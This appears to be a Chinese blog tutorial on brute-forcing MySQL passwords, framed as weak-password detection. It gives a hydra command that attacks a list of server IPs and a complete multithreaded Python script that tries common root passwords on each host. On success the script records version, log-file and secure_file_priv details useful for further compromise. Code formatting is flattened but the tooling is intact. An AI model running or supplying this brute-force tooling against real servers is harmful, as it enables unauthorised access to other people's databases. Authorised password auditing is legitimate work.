如何自动化检测Mysql的弱口令,这里介绍介绍两种方式。
一、hydra
hydra是一个口令爆破工具,kali系统自带。
hydra的使用帮助Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]Options: -R restore a previous aborted/crashed session -I ignore an existing restore file (don't wait 10 seconds) -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help -y disable use of symbols in bruteforce, see above -e nsr try "n" null password, "s" login as pass and/or "r" reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated "login:pass" format, instead of -L/-P options -M FILE list of servers to attack, one entry per line, ':' to specify port -o FILE write found login/password pairs to FILE instead of stdout -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1 -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel per target (default: 16) -T TASKS run TASKS connects in parallel overall (for -M, default: 64) -w / -W TIME wait time for a response (32) / between connects per thread (0) -c TIME wait time per login attempt over all threads (enforces -t 1) -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M) -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -O use old SSL v2 and v3 -q do not print messages about connection errors -U service module usage details -h more command line options (COMPLETE HELP) server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help)Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmppHydra is a tool to guess/crack valid login/password pairs. Licensed under AGPLv3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydraDon't use in military or secret service organizations, or for illegal purposes.These services were not compiled in: afp ncp oracle sapr3.Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://) % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries) % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080 % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)Examples: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh
常用爆破字典可使用kali自带的/usr/share/wordlists/
或者参考 使用下面的命令爆破mysql数据库,其中3306_ips. txt为mysql 服务器的ip地址列表,user. txt和password. txt为用户和口令的字典。-q表示不输出错误信息,-f表示每个ip爆破出一个正确口令就终止爆破,-o表示将结果保存在文件中。hydra -L user.txt -P password.txt -M 3306_ips.txt -o hack_result.txt -q -f mysql
结果
可参考
二、使用python爆破mysql
使用Python的mysql客户端连接mysql进行爆破
python 连接mysql数据库可参考 代码如下 brute_mysql.py#-*- coding:utf-8 -*-# author:wlj# time:2020/2/29 22:20# 使用python对mysql数据库口令进行爆破import mysql.connectorimport threadingimport queuetask_queue = queue.Queue()#口令字典weak_pwd_list = ['root','123456','12345','mysql','111111','12345678']#互斥量,用于控制线程对task_queue变量的访问threadLock = threading.Lock()def test(ip): for password in weak_pwd_list: try: conn = mysql.connector.connect(host=ip,user='root',password=password,database='mysql',port=3306) #连接数据库 cursor = conn.cursor() sql = 'SELECT @@global.basedir,@@global.general_log_file,@@global.version,@@global.version_compile_os,@@global.secure_file_priv;' cursor.execute(sql) basedir,general_log_file,version,version_compile_os,secure_file_priv = [str(x) for x in cursor.fetchone()] #print(basedir,general_log_file,version,version_compile_os,secure_file_priv) cursor.close()#关闭数据库 conn.close() print('%s,%s,%s'%(ip,'root',password)) formart_str = '%s,'*8+'\n' #将结果存入文件 open('mysql_weak_pwd.csv','a').write(formart_str%(ip,'root',password,basedir,general_log_file,version,version_compile_os,secure_file_priv)) return except Exception as e: continuedef brute_mysql(): global task_queue while True: # 获取锁,用于线程同步 threadLock.acquire() if task_queue.empty(): threadLock.release() return ip = task_queue.get() threadLock.release() test(ip)def main(): ip_list = open('3306_ips.txt','r').read().split('\n') open('mysql_weak_pwd.csv','w').write('ip,user,password,basedir,general_log_file,version,version_compile_os,secure_file_priv\n') for ip in ip_list: ip = ip.strip() if ip: task_queue.put(ip) threads = [] for i in range(0,200): t = threading.Thread(target=brute_mysql) t.start() threads.append(t) for t in threads: t.join()main()
结果